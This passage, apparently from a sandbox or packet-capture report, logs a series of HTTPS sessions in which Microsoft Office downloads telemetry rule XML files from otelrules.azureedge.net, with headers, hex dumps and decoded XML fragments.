                            2024-11-14 22:39:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                            Session IDSource IPSource PortDestination IPDestination Port
                            112192.168.2.45524013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:10 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:10 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:10 GMT
                            Content-Type: text/xml
                            Content-Length: 1397
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                            ETag: "0x8DC582BDFD43C07"
                            x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223910Z-16547b76f7fffb7lhC1DFWdsxg00000000hg00000000g5s0
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:10 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                            Session IDSource IPSource PortDestination IPDestination Port
                            113192.168.2.45524113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:10 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:10 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:10 GMT
                            Content-Type: text/xml
                            Content-Length: 1360
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                            ETag: "0x8DC582BDD74D2EC"
                            x-ms-request-id: 4901c883-e01e-0020-44af-36de90000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223910Z-16547b76f7f9bs6dhC1DFWt3rg0000000mag000000003w97
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:10 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            114192.168.2.45524213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:10 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:10 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:10 GMT
                            Content-Type: text/xml
                            Content-Length: 1427
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                            ETag: "0x8DC582BE56F6873"
                            x-ms-request-id: a35c742a-a01e-000d-06a1-34d1ea000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223910Z-r178fb8d765n474shC1DFWge7g000000032g000000010pu6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:10 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                            Session IDSource IPSource PortDestination IPDestination Port
                            115192.168.2.45524313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:10 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:10 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:10 GMT
                            Content-Type: text/xml
                            Content-Length: 1390
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                            ETag: "0x8DC582BE3002601"
                            x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223910Z-16547b76f7fnlcwwhC1DFWz6gw0000000mfg000000000hux
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:10 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                            Session IDSource IPSource PortDestination IPDestination Port
                            116192.168.2.45524413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:10 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:10 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:10 GMT
                            Content-Type: text/xml
                            Content-Length: 1401
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                            ETag: "0x8DC582BE2A9D541"
                            x-ms-request-id: 41787d00-e01e-0052-4210-36d9df000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223910Z-1866b5c5fbbrf5vdhC1DFW64zw00000000mg00000000kdc6
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:10 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                            Session IDSource IPSource PortDestination IPDestination Port
                            117192.168.2.45524513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:11 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1364
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                            ETag: "0x8DC582BEB6AD293"
                            x-ms-request-id: 9dc908ac-101e-0034-7fa0-3496ff000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-164f84587bfwh84ghC1DFWw35400000000r0000000001hr7
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:11 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            118192.168.2.45524613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:11 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1391
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                            ETag: "0x8DC582BDF58DC7E"
                            x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-16547b76f7fm7xw6hC1DFW5px40000000m4g00000000mvyc
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:11 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                            Session IDSource IPSource PortDestination IPDestination Port
                            119192.168.2.45524713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:11 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1354
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                            ETag: "0x8DC582BE0662D7C"
                            x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-16547b76f7fk9g8vhC1DFW8254000000018g000000003hez
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:11 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                            Session IDSource IPSource PortDestination IPDestination Port
                            120192.168.2.45524813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:11 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1403
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                            ETag: "0x8DC582BDCDD6400"
                            x-ms-request-id: 4df37937-b01e-003d-35ab-2bd32c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-16547b76f7ftdm8dhC1DFWs13g0000000m8000000000e79g
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                            Session IDSource IPSource PortDestination IPDestination Port
                            121192.168.2.45524913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:11 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1366
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                            ETag: "0x8DC582BDF1E2608"
                            x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-16547b76f7fkj7j4hC1DFW0a9g0000000m5000000000x4gp
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                            Session IDSource IPSource PortDestination IPDestination Port
                            122192.168.2.45525013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:11 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:12 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:11 GMT
                            Content-Type: text/xml
                            Content-Length: 1399
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                            ETag: "0x8DC582BE8C605FF"
                            x-ms-request-id: 5b14ddc3-301e-0033-2bd2-2cfa9c000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223911Z-16547b76f7fx6rhxhC1DFW76kg0000000mbg000000000d4r
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
